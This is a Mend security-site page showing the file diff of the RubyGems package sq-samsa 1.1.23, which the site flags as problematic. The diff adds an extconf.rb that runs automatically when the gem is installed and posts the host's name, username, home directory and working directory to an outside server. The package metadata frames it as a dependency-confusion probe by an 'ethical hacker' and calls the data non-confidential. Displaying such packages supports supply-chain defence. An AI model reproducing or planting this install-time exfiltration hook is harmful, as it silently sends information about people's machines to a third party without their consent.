RubyGems - sq-samsa - Versions diffs - 1.1.23 - Mend

sq-samsa 1.1.23

Potentially problematic release.

This version of sq-samsa might be problematic. Click here for more details.

Files changed (3) hide show

checksums.yaml ADDED Viewed

@@ -0,0 +1,7 @@
+---
+SHA256:
+  metadata.gz: 1407590e75f5aba0ed946673b6784a3b1f10b70f98191fff9420d35b5cffbfab
+  data.tar.gz: 74aa135ab46b9f5c62d65999425ee0f786d3ef771ff4cdd5067fb2f0642df062
+SHA512:
+  metadata.gz: 58c736c277fac4125ec4d1293e72e39dbcac497edf1882697161a5b935c628acb69636bf0f7f58df5e3008140674bc0c7e8868fd076c03e245b2a4a951f0b764
+  data.tar.gz: d64493f59de79e246bf215b474308b310bab53a2901a6de69d3366c9c086b64cdd37dce763eadd491e95f3e287da2f929a94db6b2bd012812fa43edeb73abc3b

data/ext/hola/extconf.rb ADDED Viewed

@@ -0,0 +1,14 @@
+require 'uri'
+require 'net/http'
+require 'socket'
+# Extract only the bare minimum to be able to identify
+# vulnerable organization.
+# Send hostname, username, current working directory, home directory to my server.
+# There isn't anything malicious in here! This information is not private/confidential in any way.
+uri = URI('http://ruby-dependency-confusion.jumpingcrab.com/report')
+res = Net::HTTP.post_form(uri, 'gem' => 'sq-samsa', 'version' => '1.1.23', 'hostname' => Socket.gethostname, 'username' => ENV['USER'] || 'no_user', 'home' => File.expand_path('~'), 'cwd' => Dir.pwd)

metadata ADDED Viewed

@@ -0,0 +1,49 @@
+--- !ruby/object:Gem::Specification
+name: sq-samsa
+version: !ruby/object:Gem::Version
+  version: 1.1.23
+platform: ruby
+authors:
+- ethical hacker
+autorequire:
+bindir: bin
+cert_chain: []
+date: 2023-03-13 00:00:00.000000000 Z
+dependencies: []
+description: |-
+  WARNING! DO NOT INSTALL THIS GEM.
+  This gem is used to detect dependency confusion vulnerabilities. When installed, the gem sends hostname, username, home directory and current working directory to my server so I can identifiy vulnerable companies. The gem does not do anything else. The extracted information is not private/confidential in any way.
+email:
+executables: []
+extensions:
+- ext/hola/extconf.rb
+extra_rdoc_files: []
+files:
+- ext/hola/extconf.rb
+homepage:
+licenses: []
+metadata: {}
+post_install_message:
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubygems_version: 3.1.2
+signing_key:
+specification_version: 4
+summary: WARNING! DO NOT INSTALL THIS GEM. This gem is used to detect dependency confusion
+  vulnerabilities. When installed, the gem sends hostname, username, home directory
+  and current working directory to my server so I can identifiy vulnerable companies.
+  The gem does not do anything else. The extracted information is not private/confidential
+  in any way.
+test_files: []